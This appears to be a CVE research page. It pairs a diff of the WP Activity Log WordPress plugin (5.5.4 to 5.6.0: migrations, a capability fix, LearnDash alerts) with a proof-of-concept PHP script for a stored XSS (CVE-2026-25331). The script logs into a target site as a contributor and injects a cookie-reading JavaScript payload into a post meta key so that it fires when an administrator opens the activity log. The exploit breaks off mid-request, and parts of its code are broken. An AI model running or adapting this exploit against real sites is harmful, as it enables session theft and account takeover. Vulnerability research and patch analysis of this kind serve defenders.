 					if ( isset( $item['severity'] ) ) {
@@ -805,8 +796,6 @@

 					$btns = '<a class="more-info button button-secondary data-event-inspector-link" data-darktooltip="' . $tooltip . '" data-inspector-active-text="' . __( 'Close inspector.', 'wp-security-audit-log' ) . '" title="' . __( 'Event data inspector', 'wp-security-audit-log' ) . '"' . ' href="' . $url . '">' . __( 'More details...', 'wp-security-audit-log' ) . '</a>';

-					// phpcs:disable
-					// phpcs:enable

 					return $btns;

@@ -873,8 +862,6 @@
 				 * Action and action2 are set based on the triggers above or below the table
 				 */
 				$actions = array();
-				// phpcs:disable
-				// phpcs:enable

 				$actions['disable_alerts'] = __( 'Disable this type of event IDs', 'wp-security-audit-log' );
 				$actions['disable_users']  = __( 'Do not keep a log of this user(s)' actions', 'wp-security-audit-log' );
@@ -933,8 +920,6 @@
 				}
 			}

-			// phpcs:disable
-			// phpcs:enable

 			if ( ( ( isset( $_REQUEST['action'] ) && 'disable_alerts' === $_REQUEST['action'] ) || ( isset( $_REQUEST['action2'] ) && 'disable_alerts' === $_REQUEST['action2'] ) ) && Settings_Helper::current_user_can( 'edit' ) ) {
 				if ( ! isset( $_REQUEST['_wpnonce'] ) ) {
@@ -1212,7 +1197,6 @@
 				do_action( 'wsal_list_view_top_navigation' );
 			}

-			// phpcs:disable
 		}

 		/**
@@ -1229,16 +1213,13 @@
 			$search_string = ( isset( $_REQUEST['s'] ) ? esc_sql( sanitize_text_field( wp_unslash( $_REQUEST['s'] ) ) ) : '' );

 			if ( '' !== $search_string ) {
-				// phpcs:ignore
-				/* @free:start */
+				// @free:start
 				Settings_Helper::delete_option_value( 'free-search-try' );
 				$column_names = $this->table::get_fields();
 				unset( $column_names['user_roles'] );
 				unset( $column_names['severity'] );
 				unset( $column_names['object'] );
-				// phpcs:ignore
-				/* @free:end */
-				// phpcs:ignore
+				// @free:end
 				unset( $column_names['created_on'] );
 				unset( $column_names['site_id'] );
 				foreach ( array_keys( $column_names ) as $value ) {
@@ -1247,8 +1228,7 @@

 				$query['OR'] = $search;

-				// phpcs:ignore
-				/* @free:start */
+				// @free:start
 				$query['OR'][] = array(
 					$this->table::get_table_name( self::$wsal_db ) . '.id IN (
 					SELECT DISTINCT occurrence_id
@@ -1256,8 +1236,7 @@
 						WHERE TRIM(BOTH """ FROM value) LIKE %s
 					)' => '%' . $search_string . '%',
 				);
-				// phpcs:ignore
-				/* @free:end */
+				// @free:end
 			}

 			return $query;
--- a/wp-security-audit-log/classes/MainWPAddon/class-mainwp-addon.php
+++ b/wp-security-audit-log/classes/MainWPAddon/class-mainwp-addon.php
@@ -4,7 +4,7 @@
  *
  * @package    wsal
  * @subpackage mainwp
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-2fa/
  *
--- a/wp-security-audit-log/classes/MainWPAddon/class-mainwp-api.php
+++ b/wp-security-audit-log/classes/MainWPAddon/class-mainwp-api.php
@@ -4,7 +4,7 @@
  *
  * @package    wsal
  * @subpackage mainwp
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-2fa/
  *
--- a/wp-security-audit-log/classes/MainWPAddon/class-mainwp-helper.php
+++ b/wp-security-audit-log/classes/MainWPAddon/class-mainwp-helper.php
@@ -4,7 +4,7 @@
  *
  * @package    wsal
  * @subpackage mainwp
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-2fa/
  *
--- a/wp-security-audit-log/classes/MainWPAddon/class-mainwp-settings.php
+++ b/wp-security-audit-log/classes/MainWPAddon/class-mainwp-settings.php
@@ -4,7 +4,7 @@
  *
  * @package    wsal
  * @subpackage mainwp
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-2fa/
  *
--- a/wp-security-audit-log/classes/Migration/class-abstract-migration.php
+++ b/wp-security-audit-log/classes/Migration/class-abstract-migration.php
@@ -4,7 +4,7 @@
  *
  * @package    wsal
  * @subpackage utils
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-2fa/
  */
--- a/wp-security-audit-log/classes/Migration/class-migrate-53.php
+++ b/wp-security-audit-log/classes/Migration/class-migrate-53.php
@@ -4,7 +4,7 @@
  *
  * @package    wsal
  * @subpackage utils
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-2fa/
  */
--- a/wp-security-audit-log/classes/Migration/class-migration.php
+++ b/wp-security-audit-log/classes/Migration/class-migration.php
@@ -4,7 +4,7 @@
  *
  * @package    wsal
  * @subpackage utils
- * @copyright  2025 Melapress
+ * @copyright  2026 Melapress
  * @license    https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0
  * @link       https://wordpress.org/plugins/wp-2fa/
  */
@@ -1262,6 +1262,64 @@
 		}

 		/**
+		 * Migration for version 5.6.0
+		 *
+		 * Migrates WSAL options from wp_options (of main site) to wp_sitemeta for multisite installs only.
+		 * Fixes the incorrect use of switch_to_blog(get_main_network_id()).
+		 *
+		 * @return void
+		 *
+		 * @since 5.6.0
+		 */
+		protected static function migrate_up_to_5600() {
+			// Only run on multisite.
+			if ( ! WP_Helper::is_multisite() ) {
+				return;
+			}
+
+			global $wpdb;
+
+			// ! Get the get_main_network_id() function: the returning ID was used in WSAL <= 5.5.4 to store options in multisite installs instead of get_main_site_id() or similar.
+			$main_network_id = get_main_network_id();
+
+			// Build the options table name for the main site.
+			if ( 1 === $main_network_id ) {
+				$options_table_name = $wpdb->prefix . 'options';
+			} else {
+				$options_table_name = $wpdb->prefix . $main_network_id . '_options';
+			}
+
+			/**
+			 * Get all WSAL options from the old location using direct SQL and avoid helper methods during migration.
+			 */
+			$old_options = $wpdb->get_results(
+				$wpdb->prepare(
+					"SELECT option_name, option_value FROM $options_table_name WHERE option_name LIKE %s", // phpcs:ignore WordPress.DB.PreparedSQL.InterpolatedNotPrepared
+					'wsal_%'
+				),
+				ARRAY_A
+			);
+
+			// Migrate each option.
+			foreach ( $old_options as $option ) {
+				$option_name  = $option['option_name'];
+				$option_value = maybe_unserialize( $option['option_value'] );
+
+				// Skip the networkwide_tracker_cpts setting, it's already stored in the correct table.
+				if ( 'wsal_networkwide_tracker_cpts' === $option_name ) {
+					continue;
+				}
+
+				// Write to the new location: sitemeta.
+				update_network_option( null, $option_name, $option_value );
+			}
+
+			// Mark migration as complete!
+			update_network_option( null, 'wsal_multisite_options_migrated', true );
+			update_network_option( null, 'wsal_multisite_options_migrated_date', current_time( 'mysql' ) );
+		}
+
+		/**
 		 * Remove some very old data from the database.
 		 *
 		 * @return void
--- a/wp-security-audit-log/classes/PMPAddon/class-pmp-addon-member-edit-panel.php
+++ b/wp-security-audit-log/classes/PMPAddon/class-pmp-addon-member-edit-panel.php
@@ -46,7 +46,7 @@
 			$this->slug = 'pmp-wp-activity-log';

 			// Displayed title for this panel.
-			$this->title = __( 'Member Activity', 'wp-security-audit-log' );
+			$this->title = __( 'Member Activity', 'wp-security-audit-log' );
 		}

 		/**
@@ -54,20 +54,21 @@
 		 *
 		 * Some PMP events can be triggered only by Admins and will not be returned in this panel. We get only the events that this specific user has triggered.
 		 *
+		 * @param int $user_id The user ID to fetch events for.
+		 *
 		 * @return array List of events for this user.
 		 *
 		 * @since 5.5.2
 		 */
-		private static function pmp_panel_events() {
-			// phpcs:ignore WordPress.Security.NonceVerification.Recommended
-			$user_id = isset( $_REQUEST['user_id'] ) ? (int) $_REQUEST['user_id'] : 0; // can't verify nonce in this context.
+		private static function pmp_panel_events( int $user_id ) {

-			if ( $user_id <= 0 ) {
+			$events = Paid_Memberships_Pro_Helper::get_plugin_events();
+
+			// Short-circuit if no events are configured to avoid invalid SQL.
+			if ( empty( $events ) ) {
 				return array();
 			}

-			$events = Paid_Memberships_Pro_Helper::get_plugin_events();
-
 			// Placeholders to spread events in the SQL query.
 			$placeholders = implode( ',', array_fill( 0, count( $events ), '%d' ) );

@@ -84,31 +85,71 @@
 		}

 		/**
+		 * Gets the audit log URL filtered by user.
+		 *
+		 * @param int $user_id - The user ID to use in the filter for the activity log.
+		 *
+		 * @return string - The audit log URL with user filter applied.
+		 *
+		 * @since 5.6.0
+		 */
+		private static function get_user_activity_log_url( int $user_id ): string {
+			$username = '';
+
+			if ( $user_id > 0 ) {
+				$user_data = get_userdata( $user_id );
+				if ( $user_data ) {
+					$username = $user_data->user_login;
+				}
+			}
+
+			$audit_log_url = admin_url( '?page=wsal-auditlog' );
+
+			if ( ! empty( $username ) ) {
+				$audit_log_url = add_query_arg( array( 'filters[0]' => 'username:' . $username ), $audit_log_url );
+			}
+
+			return $audit_log_url;
+		}
+
+		/**
 		 * Display the panel contents.
 		 *
 		 * @since 5.5.2
 		 */
 		protected function display_panel_contents() {
-			$events = self::pmp_panel_events();
+
+			// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Read-only panel view, no nonce provided by PMPro. Capability check below.
+			$user_id = isset( $_REQUEST['user_id'] ) ? (int) $_REQUEST['user_id'] : 0;
+
+			if ( ! current_user_can( 'edit_users' ) && get_current_user_id() !== $user_id ) {
+				return array();
+			}
+
+			if ( $user_id <= 0 ) {
+				return array();
+			}
+
+			$events = self::pmp_panel_events( $user_id );

 			?>
-			<p><?php esc_html_e( 'Here are the most recent user activity records for this member.', 'wp-security-audit-log' ); ?></p>
+			<p><?php esc_html_e( 'Here are the most recent user activity records for this member.', 'wp-security-audit-log' ); ?></p>
 			<table class="widefat striped fixed">
 				<thead>
 					<tr>
-						<th><?php esc_html_e( 'Alert ID', 'wp-security-audit-log' ); ?></th>
-						<th><?php esc_html_e( 'Severity', 'wp-security-audit-log' ); ?></th>
-						<th><?php esc_html_e( 'Date', 'wp-security-audit-log' ); ?></th>
-						<th><?php esc_html_e( 'Object', 'wp-security-audit-log' ); ?></th>
-						<th><?php esc_html_e( 'Event Type', 'wp-security-audit-log' ); ?></th>
-						<th><?php esc_html_e( 'Message', 'wp-security-audit-log' ); ?></th>
+						<th><?php esc_html_e( 'Alert ID', 'wp-security-audit-log' ); ?></th>
+						<th><?php esc_html_e( 'Severity', 'wp-security-audit-log' ); ?></th>
+						<th><?php esc_html_e( 'Date', 'wp-security-audit-log' ); ?></th>
+						<th><?php esc_html_e( 'Object', 'wp-security-audit-log' ); ?></th>
+						<th><?php esc_html_e( 'Event Type', 'wp-security-audit-log' ); ?></th>
+						<th><?php esc_html_e( 'Message', 'wp-security-audit-log' ); ?></th>
 					</tr>
 				</thead>
 				<tbody>
 			<?php

 			if ( is_array( $events ) && count( $events ) > 0 ) {
-				foreach ( self::pmp_panel_events() as $event ) {
+				foreach ( $events as $event ) {

 					// The specific ID of this occurrence record in the DB.
 					$occurence_id = (int) $event['id'];
@@ -139,14 +180,15 @@
 					<?php
 				}
 			} else {
-				echo '<p>' . esc_html__( 'No events found for this user.', 'wp-security-audit-log' ) . '</p>';
+				echo '<p>' . esc_html__( 'No events found for this user.', 'wp-security-audit-log' ) . '</p>';
 			}
+
 			?>
 				</tbody>
 			</table>
 			<p>
-				<a class="button button-primary" href="<?php echo esc_url( admin_url( '?page=wsal-auditlog' ) ); ?>">
-					<?php esc_html_e( 'View WP Activity Logs', 'wp-security-audit-log' ); ?>
+				<a class="button button-primary" href="<?php echo esc_url( self::get_user_activity_log_url( $user_id ) ); ?>">
+					<?php esc_html_e( 'View WP Activity Logs', 'wp-security-audit-log' ); ?>
 				</a>
 			</p>

--- a/wp-security-audit-log/classes/Views/AuditLog.php
+++ b/wp-security-audit-log/classes/Views/AuditLog.php
@@ -205,8 +205,6 @@
 			endif;
 		}

-		// phpcs:disable
-		// phpcs:enable

 		// Check anonymous mode.
 		if ( 'anonymous' === WSALHelpersSettings_Helper::get_option_value( 'freemius_state', 'anonymous' ) ) { // If user manually opt-out then don't show the notice.
@@ -236,8 +234,6 @@
 		// Display add-on available notice.
 		$screen = get_current_screen();

-		// phpcs:disable
-		// phpcs:enable
 	}

 	/**
@@ -512,8 +508,6 @@

 		$wsal_db = Connection::get_connection();

-		// phpcs:disable
-		// phpcs:enable

 		$alert_meta = Occurrences_Entity::get_meta_array( (int) $get_array['occurrence'], array(), $wsal_db );

@@ -565,8 +559,6 @@
 		die( json_encode( array_slice( $grp1 + $grp2, 0, 7 ) ) ); // phpcs:ignore
 	}

-	// phpcs:disable
-	// phpcs:enable

 	/**
 	 * Ajax callback to download failed login log.
@@ -934,8 +926,6 @@
 		wp_send_json_success();
 	}

-	// phpcs:disable
-	// phpcs:enable

 	/**
 	 * If the plugin-install script from core is not enqueued, add it
--- a/wp-security-audit-log/classes/WPSensors/Alerts/class-learndash-custom-alerts.php
+++ b/wp-security-audit-log/classes/WPSensors/Alerts/class-learndash-custom-alerts.php
@@ -0,0 +1,618 @@
+<?php
+/**
+ * Custom Alerts for the LearnDash plugin.
+ *
+ * Class file for alert manager.
+ *
+ * @package wsal
+ * @subpackage wsal-learndash
+ *
+ * @since 5.6.0
+ */
+
+declare(strict_types=1);
+
+namespace WSALWP_SensorsAlerts;
+
+use WSALMainWPMainWP_Addon;
+use WSALControllersConstants;
+use WSALWP_SensorsHelpersLearnDash_Helper;
+
+// Exit if accessed directly.
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+if ( ! class_exists( 'WSALWP_SensorsAlertsLearnDash_Custom_Alerts' ) ) {
+	/**
+	 * Custom sensor for the LearnDash plugin.
+	 *
+	 * @since 5.6.0
+	 */
+	class LearnDash_Custom_Alerts {
+
+		/**
+		 * Returns the structure of the alerts for extension.
+		 *
+		 * @return array
+		 *
+		 * @since 5.6.0
+		 */
+		public static function get_custom_alerts(): array {
+			if ( ( method_exists( LearnDash_Helper::class, 'load_alerts_for_sensor' ) && LearnDash_Helper::load_alerts_for_sensor() ) || MainWP_Addon::check_mainwp_plugin_active() ) {
+				return array(
+					esc_html__( 'LearnDash LMS', 'wp-security-audit-log' ) => array(
+						esc_html__( 'Courses', 'wp-security-audit-log' ) => self::get_courses_array(),
+						esc_html__( 'Lessons', 'wp-security-audit-log' ) => self::get_lessons_array(),
+						esc_html__( 'Topics', 'wp-security-audit-log' ) => self::get_topics_array(),
+						esc_html__( 'Groups', 'wp-security-audit-log' ) => self::get_groups_array(),
+						esc_html__( 'Certificates', 'wp-security-audit-log' ) => self::get_certificates_array(),
+						esc_html__( 'Students', 'wp-security-audit-log' ) => self::get_students_array(),
+					),
+				);
+			}
+
+			return array();
+		}
+
+		/**
+		 * Returns the list of LearnDash alerts that should be disabled by default.
+		 *
+		 * These are student activity events that can generate a high log volume of events.
+		 *
+		 * @return int[] - List of alert IDs.
+		 *
+		 * @since 5.6.0
+		 */
+		public static function get_default_disabled_alerts(): array {
+			return array( 11017, 11556, 11557, 11558, 11559, 11561, 11562, 11563, 11564 );
+		}
+
+		/**
+		 * Adds LearnDash default disabled alerts to the global list.
+		 *
+		 * @param int[] $alerts - Current list of default disabled alert IDs.
+		 *
+		 * @return int[] - Updated list with LearnDash alerts included.
+		 *
+		 * @since 5.6.0
+		 */
+		public static function add_default_disabled_alerts( array $alerts ): array {
+			return array_merge( $alerts, self::get_default_disabled_alerts() );
+		}
+
+		/**
+		 * Returns an array with all the events attached to the sensor (if there are different types of events, this method will merge them into one array - the events ids will be used as keys)
+		 *
+		 * @return array
+		 *
+		 * @since 5.6.0
+		 */
+		public static function get_alerts_array(): array {
+
+			return self::get_courses_array() +
+			self::get_lessons_array() +
+			self::get_topics_array() +
+			self::get_groups_array() +
+			self::get_certificates_array() +
+			self::get_students_array();
+		}
+
+		/**
+		 * Learndash Courses Events
+		 *
+		 * @return array
+		 *
+		 * @since 5.6.0
+		 */
+		public static function get_courses_array(): array {
+			return array(
+				11000 => array(
+					11000,
+					WSAL_INFORMATIONAL,
+					esc_html__( 'A course was created', 'wp-security-audit-log' ),
+					esc_html__( 'Created the course %PostTitle%.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Course ID', 'wp-security-audit-log' ) => '%PostID%',
+						esc_html__( 'Course author', 'wp-security-audit-log' ) => '%PostAuthor%',
+						esc_html__( 'Categories', 'wp-security-audit-log' ) => '%Categories%',
+						esc_html__( 'Course category', 'wp-security-audit-log' ) => '%LdPostCategory%',
+						esc_html__( 'Course status', 'wp-security-audit-log' ) => '%PostStatus%',
+					),
+					Constants::wsaldefaults_build_links( array( 'EditorLinkPost', 'PostUrlIfPublished' ) ),
+					'learndash_courses',
+					'created',
+				),
+				11001 => array(
+					11001,
+					WSAL_LOW,
+					esc_html__( 'A course was published', 'wp-security-audit-log' ),
+					esc_html__( 'Published the course %PostTitle%.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Course ID', 'wp-security-audit-log' ) => '%PostID%',
+						esc_html__( 'Course author', 'wp-security-audit-log' ) => '%PostAuthor%',
+						esc_html__( 'Price type', 'wp-security-audit-log' ) => '%PriceType%',
+						esc_html__( 'Categories', 'wp-security-audit-log' ) => '%Categories%',
+						esc_html__( 'Course category', 'wp-security-audit-log' ) => '%LdPostCategory%',
+					),
+					Constants::wsaldefaults_build_links( array( 'EditorLinkPost', 'PostUrlIfPublished' ) ),
+					'learndash_courses',
+					'published',
+				),
+				11003 => array(
+					11003,
+					WSAL_HIGH,
+					esc_html__( 'A course was moved to trash', 'wp-security-audit-log' ),
+					esc_html__( 'Moved the course %PostTitle% to trash.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Course ID', 'wp-security-audit-log' ) => '%PostID%',
+						esc_html__( 'Course author', 'wp-security-audit-log' ) => '%PostAuthor%',
+						esc_html__( 'Price type', 'wp-security-audit-log' ) => '%PriceType%',
+						esc_html__( 'Categories', 'wp-security-audit-log' ) => '%Categories%',
+						esc_html__( 'Course category', 'wp-security-audit-log' ) => '%LdPostCategory%',
+						esc_html__( 'Course status', 'wp-security-audit-log' ) => '%PostStatus%',
+					),
+					array(),
+					'learndash_courses',
+					'deleted',
+				),
+				11004 => array(
+					11004,
+					WSAL_HIGH,
+					esc_html__( 'A course was permanently deleted', 'wp-security-audit-log' ),
+					esc_html__( 'Permanently deleted the course %PostTitle%.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Course ID', 'wp-security-audit-log' ) => '%PostID%',
+						esc_html__( 'Price type', 'wp-security-audit-log' ) => '%PriceType%',
+						esc_html__( 'Categories', 'wp-security-audit-log' ) => '%Categories%',
+						esc_html__( 'Course category', 'wp-security-audit-log' ) => '%LdPostCategory%',
+					),
+					array(),
+					'learndash_courses',
+					'deleted',
+				),
+				11005 => array(
+					11005,
+					WSAL_LOW,
+					esc_html__( 'A course was restored from trash', 'wp-security-audit-log' ),
+					esc_html__( 'Restored the course %PostTitle% from trash.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Course ID', 'wp-security-audit-log' ) => '%PostID%',
+						esc_html__( 'Course author', 'wp-security-audit-log' ) => '%PostAuthor%',
+						esc_html__( 'Price type', 'wp-security-audit-log' ) => '%PriceType%',
+						esc_html__( 'Categories', 'wp-security-audit-log' ) => '%Categories%',
+						esc_html__( 'Course category', 'wp-security-audit-log' ) => '%LdPostCategory%',
+					),
+					Constants::wsaldefaults_build_links( array( 'EditorLinkPost', 'PostUrlIfPublished' ) ),
+					'learndash_courses',
+					'restored',
+				),
+				11006 => array(
+					11006,
+					WSAL_INFORMATIONAL,
+					esc_html__( 'A course was duplicated', 'wp-security-audit-log' ),
+					esc_html__( 'Duplicated the course %PostTitle%.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Course ID', 'wp-security-audit-log' ) => '%PostID%',
+						esc_html__( 'Price type', 'wp-security-audit-log' ) => '%PriceType%',
+						esc_html__( 'Category', 'wp-security-audit-log' ) => '%Categories%',
+						esc_html__( 'Course category', 'wp-security-audit-log' ) => '%LdPostCategory%',
+					),
+					array(),
+					'learndash_courses',
+					'duplicated',
+				),
+				11080 => array(
+					11080,
+					WSAL_INFORMATIONAL,
+					esc_html__( 'Course category created', 'wp-security-audit-log' ),
+					esc_html__( 'Created the course category %TaxonomyTitle%.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Slug', 'wp-security-audit-log' ) => '%Slug%',
+					),
+					Constants::wsaldefaults_build_links( array( 'CategoryLink' ) ),
+					'learndash_courses',
+					'created',
+				),
+				11081 => array(
+					11081,
+					WSAL_INFORMATIONAL,
+					esc_html__( 'Course category deleted', 'wp-security-audit-log' ),
+					esc_html__( 'Deleted the course category %TaxonomyTitle%.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Slug', 'wp-security-audit-log' ) => '%Slug%',
+					),
+					array(),
+					'learndash_courses',
+					'deleted',
+				),
+				11090 => array(
+					11090,
+					WSAL_INFORMATIONAL,
+					esc_html__( 'Course tag created', 'wp-security-audit-log' ),
+					esc_html__( 'Created the course tag %TaxonomyTitle%.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Slug', 'wp-security-audit-log' ) => '%Slug%',
+					),
+					array( esc_html__( 'View tag', 'wp-security-audit-log' ) => '%TagLink%' ),
+					'learndash_courses',
+					'created',
+				),
+				11091 => array(
+					11091,
+					WSAL_INFORMATIONAL,
+					esc_html__( 'Course tag deleted', 'wp-security-audit-log' ),
+					esc_html__( 'Deleted the course tag %TaxonomyTitle%.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Slug', 'wp-security-audit-log' ) => '%Slug%',
+					),
+					array(),
+					'learndash_courses',
+					'deleted',
+				),
+			);
+		}
+
+		/**
+		 * Learndash Lessons Events
+		 *
+		 * @return array
+		 *
+		 * @since 5.6.0
+		 */
+		public static function get_lessons_array(): array {
+			return array(
+				11200 => array(
+					11200,
+					WSAL_INFORMATIONAL,
+					esc_html__( 'A lesson was created', 'wp-security-audit-log' ),
+					esc_html__( 'Created the lesson %PostTitle%.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Lesson ID', 'wp-security-audit-log' ) => '%PostID%',
+						esc_html__( 'Lesson author', 'wp-security-audit-log' ) => '%PostAuthor%',
+						esc_html__( 'Category', 'wp-security-audit-log' ) => '%Categories%',
+						esc_html__( 'Lesson category', 'wp-security-audit-log' ) => '%LdPostCategory%',
+						esc_html__( 'Lesson status', 'wp-security-audit-log' ) => '%PostStatus%',
+					),
+					Constants::wsaldefaults_build_links( array( 'EditorLinkPost' ) ),
+					'learndash_lessons',
+					'created',
+				),
+				11201 => array(
+					11201,
+					WSAL_INFORMATIONAL,
+					esc_html__( 'A lesson was published', 'wp-security-audit-log' ),
+					esc_html__( 'Published the lesson %PostTitle%.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Lesson ID', 'wp-security-audit-log' ) => '%PostID%',
+						esc_html__( 'Lesson author', 'wp-security-audit-log' ) => '%PostAuthor%',
+						esc_html__( 'Category', 'wp-security-audit-log' ) => '%Categories%',
+						esc_html__( 'Lesson category', 'wp-security-audit-log' ) => '%LdPostCategory%',
+					),
+					Constants::wsaldefaults_build_links( array( 'EditorLinkPost', 'PostUrlIfPublished' ) ),
+					'learndash_lessons',
+					'published',
+				),
+				11206 => array(
+					11206,
+					WSAL_MEDIUM,
+					esc_html__( 'A lesson was moved to trash', 'wp-security-audit-log' ),
+					esc_html__( 'Moved the lesson %PostTitle% to trash.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Lesson ID', 'wp-security-audit-log' ) => '%PostID%',
+						esc_html__( 'Category', 'wp-security-audit-log' ) => '%Categories%',
+						esc_html__( 'Lesson category', 'wp-security-audit-log' ) => '%LdPostCategory%',
+						esc_html__( 'Lesson status', 'wp-security-audit-log' ) => '%PostStatus%',
+					),
+					Constants::wsaldefaults_build_links( array( 'PostUrlIfPublished' ) ),
+					'learndash_lessons',
+					'deleted',
+				),
+
+				11207 => array(
+					11207,
+					WSAL_HIGH,
+					esc_html__( 'A lesson was permanently deleted', 'wp-security-audit-log' ),
+					esc_html__( 'Permanently deleted the lesson %PostTitle%.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Lesson ID', 'wp-security-audit-log' ) => '%PostID%',
+						esc_html__( 'Category', 'wp-security-audit-log' ) => '%Categories%',
+						esc_html__( 'Lesson category', 'wp-security-audit-log' ) => '%LdPostCategory%',
+					),
+					array(),
+					'learndash_lessons',
+					'deleted',
+				),
+				11208 => array(
+					11208,
+					WSAL_LOW,
+					esc_html__( 'A lesson was restored from trash', 'wp-security-audit-log' ),
+					esc_html__( 'Restored the lesson %PostTitle% from trash.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Lesson ID', 'wp-security-audit-log' ) => '%PostID%',
+						esc_html__( 'Category', 'wp-security-audit-log' ) => '%Categories%',
+						esc_html__( 'Lesson category', 'wp-security-audit-log' ) => '%LdPostCategory%',
+					),
+					array(),
+					'learndash_lessons',
+					'restored',
+				),
+				11209 => array(
+					11209,
+					WSAL_INFORMATIONAL,
+					esc_html__( 'A lesson was duplicated', 'wp-security-audit-log' ),
+					esc_html__( 'Duplicated the lesson %PostTitle%.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Lesson ID', 'wp-security-audit-log' ) => '%PostID%',
+						esc_html__( 'Category', 'wp-security-audit-log' ) => '%Categories%',
+						esc_html__( 'Lesson category', 'wp-security-audit-log' ) => '%LdPostCategory%',
+					),
+					array(),
+					'learndash_lessons',
+					'duplicated',
+				),
+				11300 => array(
+					11300,
+					WSAL_INFORMATIONAL,
+					esc_html__( 'A lesson category was created', 'wp-security-audit-log' ),
+					esc_html__( 'Created the lesson category %TaxonomyTitle%.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Slug', 'wp-security-audit-log' ) => '%Slug%',
+					),
+					array( esc_html__( 'View lesson category', 'wp-security-audit-log' ) => '%CategoryLink%' ),
+					'learndash_lessons',
+					'created',
+				),
+				11301 => array(
+					11301,
+					WSAL_INFORMATIONAL,
+					esc_html__( 'A lesson category was deleted', 'wp-security-audit-log' ),
+					esc_html__( 'Deleted the lesson category %TaxonomyTitle%.', 'wp-security-audit-log' ),
+					array(
+						esc_html__( 'Slug', 'wp-security-audit-log' ) => '%Slug%',
+					),
+					array(),
+					'learndash_lessons',
+					'deleted',
+				),
+				11350 => array(
+					11350,
+					WSAL_INFORMATIONAL,
+					esc_html__( 'A lesson tag was created', 'wp-security-audit-log' ),
+					esc_html__( 'Created the lesson tag %TaxonomyTitle%', 'wp-security-audit-log

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25331 - Activity Log <= 5.5.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
<?php

/**
 * Proof of Concept for CVE-2026-25331
 * This script demonstrates the stored XSS vulnerability in Activity Log plugin <= 5.5.4
 * Requires contributor-level WordPress credentials
 */

$target_url = 'http://vulnerable-wordpress-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS
$password = 'contributor_password'; // CHANGE THIS

// Malicious payload that will execute when admin views activity log
$payload = '");alert(document.cookie);//';

// First, authenticate to get cookies
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-login.php',
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => 'cookies.txt',
    CURLOPT_COOKIEFILE => 'cookies.txt',
    CURLOPT_HEADER => true
]);

$response = curl_exec($ch);

// Check if login was successful
if (strpos($response, 'Location: ' . $target_url . '/wp-admin/') === false) {
    die('Login failed. Check credentials.');
}

// The vulnerability requires triggering an event that uses the %MetaLink% formatter
// One approach is to modify a post meta field that gets logged
// Create a new post as contributor
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/post-new.php',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'post_title' => 'Test Post for XSS',
        'content' => 'Test content',
        'publish' => 'Publish',
        'post_type' => 'post',
        '_wpnonce' => $this->extract_nonce($response, '_wpnonce'), // Extract nonce from page
        '_wp_http_referer' => '/wp-admin/post-new.php'
    ])
]);

$response = curl_exec($ch);
$post_id = $this->extract_post_id($response);

if (!$post_id) {
    die('Failed to create post');
}

// Add custom field with malicious payload
// The plugin logs custom field changes and uses %MetaLink% for the meta key
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url . '/wp-admin/post.php',
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'post' => $post_id,
        'action' => 'editpost',
        'meta_key' => $payload, // Malicious meta key containing XSS payload
